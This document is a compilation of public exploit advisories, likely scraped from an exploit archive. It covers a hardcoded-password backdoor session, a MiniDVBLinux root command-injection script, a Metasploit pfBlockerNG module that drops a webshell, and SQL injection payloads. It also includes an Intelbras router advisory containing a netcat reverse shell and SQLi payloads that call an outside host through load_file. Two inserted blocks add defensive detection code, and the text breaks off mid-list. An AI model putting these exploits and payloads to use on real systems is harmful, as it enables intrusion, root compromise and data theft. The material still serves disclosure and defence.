<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Redkod.d<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.<br />Family: Redkod<br />Type: PE32<br />MD5: bb309bdd071d5733efefe940a89fcbe8<br />Vuln ID: MVID-2022-0649<br />Disclosure: 10/16/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 4820<br />===========================================================<br />= RedKod Backdoor 1.0 =<br />= By R-e-D =<br />= http://www.redkod.com =<br />= r-e-d@redkod.com =<br />===========================================================<br /><br /><br />Password: redkod<br /><br />RBackdoor# exec calc<br />msg: Execution effectuee avec succes<br /><br />RBackdoor# setpass malvuln<br /><br />RBackdoor# help<br />COMMAND HELP:<br /><br /><br /> > Shell Commands :<br /><br />CD Permet de changer de repertoire courant<br />CLEAR Efface le buffer de la console<br />COPY Permet de copier un fichier<br />DEL Permet d'effacer un ou plusieurs fichier<br />DIR Permet de lister le contenu d'un repertoire<br />FIND Recherche un fichier a travers le path<br />HELP Affiche cette aide<br />LS Permet de lister le contenu d'un repertoire<br />MD Permet de creer un repertoire<br />MOVE Permet de deplacer un fichier ou un repertoire<br />REN Permet de renommer un fichier<br />PWD Permet de recuperer le repertoire courant<br />RMDIR Permet d'effacer un repertoire<br />SHELL Permet d'executer toute commande DOS sur le systeme cible<br /><br /> > Informations Commands :<br /><br />CLIP Permet de recuperer le contenu du presse papier<br />DISKINFO Permet de recuperer des informations sur les disques durs<br />GETGROUPS Permet de recuperer des informations sur les groupes, les users, les SID :)<br />GETPROCESS Recupere et affiche la liste des processus actifs<br />GETSERVICES Permet d'afficher les services NT presents sur une machine local ou distante<br />LISTEVENT Permet de lister les journaux du eventlog<br />NETSHARE Permer d'afficher les ressources partager de la machine local ou d'une machine distante<br />ENUMSERVER Permet d'afficher les servers appartenant au domaine<br />SYSINFO Permet de recuperer des informations sur le systeme cible<br />TIME Affiche l'heure et la date du systeme distant<br />UPTIME Permet d'afficher depuis combien de temps le systeme fonctionne<br />USERINFO Permet d'obtenir des informations sur un utilisateur<br />VERSION Affiche la version de RBackdoor<br />WHOAMI Permet de recuperer l'utilisateur logge sur la machine<br /><br /> > Interactions Commands :<br /><br />ADDEVENT Permet d'ajouter un evenement dans l'eventlog<br />ADDSHARE Permet d'ajouter une ressource partagee<br />BEEP Fait beeper le haut parleur interne<br />CLEARLOG Permet d'effacer un journal complet de l'eventlog<br />DELSERVICE Permet de supprimer un service present<br />DELSHARE Permet de retirer une ressource partagee<br />EXEC Permet d'executer une commande sur le systeme cible<br />HEXEC Permet d'executer une commande tout en cachant sa sortie<br />LOGOFF Permet de fermer la session de l'utilisateur courant<br />KILLPROCESS Permet de killer un processus<br />MOUSE Permet de placer le curseur de la souris au coordonnees x et y voulues<br />MSGBOX Permet d'envoyer une boite de dialogue au systeme cible avec message personalise<br />RCHAT Permet d'etablir une communication ecrite avec une personne etant present sur le pc distant<br />REBOOT Permet de redemarrer la machine<br />SCREENSHOT Permet de prendre un screenshot du bureau de la machine distante<br />SENDKEY Permet d'emuler la pression d'une touche du clavier<br />SETNAME Change le nom NetBios du serveur<br />STARTSERVICE Permet de demarrer un servive present sur la machine serveur<br />STOPSERVICE Permet de stopper un service present et demarrer<br /><br /> > Administration of RBackdoor Commands :<br /><br />EXIT Permet de fermer la connection a la backdoor tout en laissant la backdoor active<br />KILL Permet de desactiver ou de reactiver la backdoor<br />OPEN Creer un nouveau processus de RBackdoor sur un autre port<br />SETPASS Permet de modifier le pass associe a la backdoor<br /><br /> > RBackdoor Tools :<br /><br />FGET Permet de recuperer un fichier sur un serveur FTP<br />FPUT Permet d'uploader un fichier sur un serveur FTP<br />MAIL Permet d'envoyer un mail, etc...<br />NETPATCH Rootkit permettant de patcher netstat.exe pour cacher RBackdoor<br />RCRYPT Permet de crypter ou de decrypter un fichier<br />RPATCH Permet de patcher le systeme pour effacer rbackdoor<br />RSHELL Permet de lancer un vrai shell DOS<br />SCAN Permet de scanner les ports d'une hote distante<br />TELNET Permet de se connecter a une hote distante (TCP Protocol Only)<br />VIEW Permet de lire le contenu d'un fichier<br />WGET Recupere et d'affiche le contenu d'un fichier heberge sur un serveur http<br />WRITE Permet d'ecrire directement dans un fichier<br /><br />msg: Tapez help <command> pour des informations plus precises sur la commande voulue<br /><br />RBackdoor# rshell<br /> ATTENTION!!<br />Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c4jqho\victim<br /><br />C:\dump>net user hyp3rlinx 666 /add<br />net user hyp3rlinx 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The application suffers from an OS command injection vulnerability.<br /># This can be exploited to execute arbitrary commands with root privileges.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5717<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re, sys<br /><br />#test case 001<br />#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT<br />#test case 004<br />#http://ip:8008/?site=about&name=blind&file=$(id)<br />#cat: can't open 'uid=0(root)': No such file or directory<br />#cat: can't open 'gid=0(root)': No such file or directory<br />#test case 005<br />#http://ip:8008/?site=about&name=blind&file=`id`<br />#cat: can't open 'uid=0(root)': No such file or directory<br />#cat: can't open 'gid=0(root)': No such file or directory<br /><br />if len(sys.argv) < 3:<br />    print('MiniDVBLinux 5.4 Command Injection PoC')<br />    print('Usage: ./mldhd_root2.py [url] [cmd]')<br />    sys.exit(17)<br />else:<br />    url = sys.argv[1]<br />    cmd = sys.argv[2]<br /><br /># The 'file' parameter is passed unquoted to a shell on the device, so a<br /># $(...) substitution runs 'cmd' and its output lands in the <pre> block.<br />req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')<br />outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('<pre>','').replace('</pre>',''))<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  include Msf::Exploit::FileDropper<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',<br />        'Description' => %q{<br />          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to<br />          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected<br />          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.<br />        },<br />        'Author' => [<br />          'IHTeam', # discovery<br />          'jheysel-r7' # module<br />        ],<br />        'References' => [<br />          [ 'CVE', '2022-31814' ],<br />          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']<br />        ],<br />        'License' => MSF_LICENSE,<br />        'Platform' => 'unix',<br />        'Privileged' => false,<br />        'Arch' => [ ARCH_CMD ],<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_openssl'<br />              }<br />            }<br />          ],<br />          [<br />            'BSD Dropper',<br />            {<br />              'Platform' => 'bsd',<br />              'Arch' => [ARCH_X64],<br />              'Type' => :bsd_dropper,<br />              'CmdStagerFlavor' => [ 'curl' ],<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 1,<br />        'DisclosureDate' => '2022-09-05',<br />        'DefaultOptions' => {<br />          'SSL' => true,<br />          'RPORT' => 443<br />        },<br />        'Notes' => {<br />          'Stability' => [ CRASH_SERVICE_DOWN ],<br />          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br />          'Reliability' => [ REPEATABLE_SESSION, ]<br />        }<br />      )<br />    )<br /><br />    register_options(<br />      [<br />        OptString.new('WEBSHELL_NAME', [<br />          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil<br />        ])<br />      ]<br />    )<br />  end<br /><br />  def upload_shell<br />    print_status 'Uploading shell...'<br />    if datastore['WEBSHELL_NAME'].blank?<br />      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"<br />    else<br />      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"<br />    end<br />    @parameter_name = Rex::Text.rand_text_alpha(4..12)<br />    print_status("Webshell name is: #{@webshell_name}")<br />    web_shell_contents = <<~EOF<br />      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');<br />    EOF<br />    # dc's 16i input mode only accepts upper-case hex digits, hence .upcase<br />    encoded_php = web_shell_contents.unpack('H*')[0].upcase<br />    send_request_raw(<br />      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),<br />      'headers' => {<br />        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"<br />      }<br />    )<br />    sleep datastore['WfsDelay']<br />    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")<br />  end<br /><br />  def check<br />    upload_shell<br />    check_resp = send_request_cgi(<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),<br />      'vars_post' => {<br />        @parameter_name.to_s => 'id'<br />      }<br />    )<br />    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')<br /><br />    Exploit::CheckCode::Vulnerable<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, @webshell_name),<br />      'headers' => {<br />        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'<br />      },<br />      'vars_post' => {<br />        @parameter_name.to_s => cmd<br />      }<br />    })<br />  end<br /><br />  def exploit<br />    upload_shell unless datastore['AutoCheck']<br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    case target['Type']<br />    when :unix_cmd<br />      execute_command(payload.encoded)<br />    when :bsd_dropper<br />      execute_cmdstager<br />    end<br />  end<br />end<br /></code></pre>
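A forensic decoder for the Host-header payload this module builds, added here as an example that is not part of the Metasploit module: it recovers the PHP dropper from the `echo '16i <HEX> P' | dc | php` pipeline and pulls out the path of the written webshell, which is the on-disk indicator a responder would look for. The sample header value, webshell name and parameter name below are constructed.

```python
"""Forensic helper for the pfBlockerNG Host-header injection (CVE-2022-31814).

Added example, not part of the Metasploit module above. The module hex-encodes
its PHP dropper and injects  echo '16i <HEX> P' | dc | php  into the Host
header: dc reads the hex as one number (16i = input radix 16, which is why the
digits must be upper-case) and P prints that number as a raw byte stream, i.e.
the original PHP, straight into php.
"""
import re

# The dc program embedded in the injected Host header.
DC_PAYLOAD_RE = re.compile(r"16i\s+([0-9A-F]+)\s+P")
# file_put_contents('<path>', ...) inside the recovered PHP dropper.
DROP_PATH_RE = re.compile(r"file_put_contents\(\s*'([^']+)'")


def decode_dc_hex(hex_digits: str) -> bytes:
    """Reproduce what `dc` prints for `16i <hex> P`.

    P emits the integer as big-endian bytes, so this is plain hex decoding.
    An odd digit count means a leading half-byte; left-padding with '0'
    yields the same integer and therefore the same bytes.
    """
    if not hex_digits or not re.fullmatch(r"[0-9A-F]+", hex_digits):
        raise ValueError("dc with 16i only accepts upper-case hex digits")
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits
    return bytes.fromhex(hex_digits)


def analyse_host_header(host_value: str) -> dict:
    """Return what a defender wants from a suspicious Host header value.

    Keys: 'injected' (bool), 'php' (recovered dropper source or None) and
    'dropped_file' (path handed to file_put_contents, or None).
    """
    result = {"injected": False, "php": None, "dropped_file": None}
    match = DC_PAYLOAD_RE.search(host_value)
    if match is None:
        # Not this payload shape; still flag shell metacharacters, which
        # never belong in a legitimate Host header.
        result["injected"] = any(c in host_value for c in "';|$`")
        return result
    result["injected"] = True
    php = decode_dc_hex(match.group(1)).decode("utf-8", errors="replace")
    result["php"] = php
    path = DROP_PATH_RE.search(php)
    if path:
        result["dropped_file"] = path.group(1)
    return result


# Constructed sample in the shape the module builds; the webshell name and
# POST parameter name are made up (the module randomises both).
SAMPLE_PHP = (
    "<?php echo file_put_contents('/usr/local/www/examplename.php',"
    "'<?php echo(passthru($_POST[\"exampleparam\"]));');\n"
)
SAMPLE_HOST = "' *; echo '16i " + SAMPLE_PHP.encode().hex().upper() + " P' | dc | php; '"


def analyse_sample() -> dict:
    """Run the analysis over the constructed sample header."""
    return analyse_host_header(SAMPLE_HOST)


if __name__ == "__main__":
    report = analyse_sample()
    print("injected:", report["injected"])
    print("dropped file:", report["dropped_file"])
    print("recovered php:", report["php"])
```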
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Webtribute GmbH - courts-reservation.ch │<br />│ Software : Joomla OSG Courts Reservation 1.4.9 │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /en/table-views/tab-view/booking<br /><br />GET parameter 'date' is vulnerable<br /><br /><br />---<br />Parameter: date (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: rid=17&tsid=16&date=2022-10-12" AND (SELECT 6041 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(6041=6041,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fmfh&wd=3<br />---<br /><br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Nginx<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: '***_osg_courts_demo'<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>CyberDanube Security Research 20221009-0<br />-------------------------------------------------------------------------------<br /> title| Authenticated Command Injection<br /> product| Intelbras WiFiber 120AC inMesh<br /> vulnerable version| 1.1-220216<br /> fixed version| 1-1-220826<br /> CVE number|<br /> impact| High<br /> homepage| https://www.intelbras.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"We are Intelbras. A company that for 45 years has been offering innovative<br />solutions in security, networks, communication and energy. Our dream began to<br />come to life there in 1976, in the city of São José, having originated from an<br />INspiration and a promising idea: to manufacture PABX centrals. During the<br />80's, we surprised the market with the launch of the first PABX developed with<br />national technology, a product that showed everyone our innovative DNA. The 90s<br />were marked by the consolidation of the company in the telecommunications<br />segment and we became leaders in the PABX and telephone terminals segment. The<br />turn of the millennium represented the search for greater connection and<br />proximity to people, something that is in total harmony with our philosophy to<br />this day. More consolidated in the market, in 2010 we opened 3 manufacturing<br />units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.<br />We reached our 45th birthday having reached a historic milestone: we have been<br />a company listed on the B3 since February 2021. Our trajectory so far has been<br />INnovative, INtelligent and INSpiring. We saw innovation, which is part of our<br />DNA, increasingly present in our daily lives. And it was only possible to<br />write a story so full of achievements because employees, partners and customers<br />were close and believed in us."<br /><br />Source: https://www.intelbras.com/en/institutional/who-we-are<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />WiFiber 120AC inMesh / 1.1-220216<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating system of<br />the device with all implications. If such a device is acting as key device in<br />an industrial network, more extensive damage in the corresponding network can<br />be done by an attacker.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to an authenticated command injection via POST<br />parameters. The following proof-of-concept shows how to inject the command<br />"ls /" to the system which gets executed in the background:<br /><br />===============================================================================<br />POST /boaform/formPing6 HTTP/1.1<br />Host: 192.168.3.147<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 87<br />Origin: http://192.168.3.147<br />Connection: close<br />Referer: http://192.168.3.147/ping6.asp<br />Upgrade-Insecure-Requests: 1<br /><br />pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908<br />===============================================================================<br /><br />The following commands can be used to open a reverse shell:<br /><br />"rm -f /tmp/f"<br />"mkfifo /tmp/f"<br />"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"<br /><br />Those commands were sent via a crafted POST request:<br /><br />===============================================================================<br />POST /boaform/formTracert HTTP/1.1<br />Host: 192.168.3.147<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 255<br />Origin: http://192.168.3.147<br />Connection: close<br />Referer: http://192.168.3.147/tracert.asp<br />Upgrade-Insecure-Requests: 1<br /><br />proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290<br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version 1-1-220826.<br /><br />https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Intelbras customers to upgrade the firmware to the<br />latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.<br />2022-08-03: Request from Intelbras to send the advisory to<br /> csirt@intelbras.com.br; Sent the advisory to this address.<br />2022-08-30: Asked for status update; Vendor answered that the new firmware<br /> version has been released the day before. Set the disclosure date<br /> to 2022-10-03 (60 days policy).<br />2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.<br />2022-10-09: Coordinated disclosure of advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
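Detection and input validation for the two OS command injections on this page, the MiniDVBLinux `file=$(cmd)` query parameter and the Intelbras `pingAddr`/`traceAddr` POST fields, as an added example that is not code from either advisory or vendor. The parameter names come from the advisories; the request records are constructed, and `is_valid_ping_target` is the allowlist check a ping or traceroute handler should apply before anything reaches a shell.

```python
"""Detection and input validation for the two OS command injections on this
page: MiniDVBLinux's `file=$(cmd)` query parameter (an attacker-chosen path
handed to cat) and the Intelbras WiFiber `pingAddr` / `traceAddr` POST fields.

Added example, not code from either vendor or advisory. Parameter names are
taken from the advisories; the request records below are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Sequences that break out of a shell word when a handler builds a command
# such as `cat $file` or `ping $addr` from user input. They are matched after
# URL decoding, so %3B (';'), %24%28 ('$(') and %26 ('&') are caught too.
SHELL_META_RE = re.compile(r"\$\(|`|;|\|\||\||&&|&|\n|>|<")

# Fields the vulnerable handlers pass to a shell, per the two advisories.
WATCHED_PARAMS = {"file", "pingAddr", "traceAddr"}

# RFC 1123 host name: dot-separated labels of 1..63 alphanumerics/hyphens,
# no leading or trailing hyphen, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def scan_request(method: str, target: str, body: str = "") -> list[dict]:
    """Flag parameters whose decoded value contains shell metacharacters.

    `target` is the request-line path including the query string; `body` is
    the form-encoded POST body, if any. Every parameter is inspected, but a
    hit on a WATCHED_PARAMS field is rated high because it is a known exec sink.
    """
    hits = []
    sources = [("query", urlsplit(target).query)]
    if method.upper() == "POST" and body:
        sources.append(("body", body))
    for location, raw in sources:
        for name, value in parse_qsl(raw, keep_blank_values=True):
            tokens = SHELL_META_RE.findall(value)
            if tokens:
                hits.append({
                    "location": location,
                    "param": name,
                    "value": value,
                    "tokens": tokens,
                    "severity": "high" if name in WATCHED_PARAMS else "medium",
                })
    return hits


def is_valid_ping_target(value: str) -> bool:
    """Allowlist check a ping/traceroute handler must apply before any exec:
    the target is an IPv4/IPv6 literal or a syntactically valid host name,
    nothing else. ';ls /;' and 'a|b' fail here instead of reaching /bin/sh."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


# Constructed request records: a benign request followed by the advisory's
# injected one, for each product.
SAMPLE_REQUESTS = [
    ("GET", "/?site=about&name=MLD%20about&file=/boot/ABOUT", ""),
    ("GET", "/?site=about&name=blind&file=$(id)", ""),
    ("GET", "/?site=about&name=blind&file=`id`", ""),
    ("POST", "/boaform/formPing6",
     "pingAddr=2001%3Adb8%3A%3A1&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908"),
    ("POST", "/boaform/formPing6",
     "pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908"),
]


def scan_samples() -> list[dict]:
    """Run scan_request over SAMPLE_REQUESTS, tagging each hit with its path."""
    findings = []
    for method, target, body in SAMPLE_REQUESTS:
        for hit in scan_request(method, target, body):
            hit["target"] = target
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan_samples():
        print(f"[{hit['severity']}] {hit['target']} {hit['location']}:"
              f"{hit['param']}={hit['value']!r} tokens={hit['tokens']}")
```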
<pre><code>The online-shopping-system-advanced-1.0 suffers from multiple SQLi<br />The attacker can steal all information from the database of this system.<br />Status: CRITICAL<br /><br />[+] Exploit:<br /><br />```MYSQL<br />Parameter: cid (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#<br />```<br />--------------------------------------------------------------------------------------------<br />```MYSQL<br />Parameter: password (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on<br />```<br />--------------------------------------------------------------------------------------------<br /><br />## And more:<br /><br />```txt<br />[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]<br />[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]<br />[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]]<br />[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]<br />[1.5. 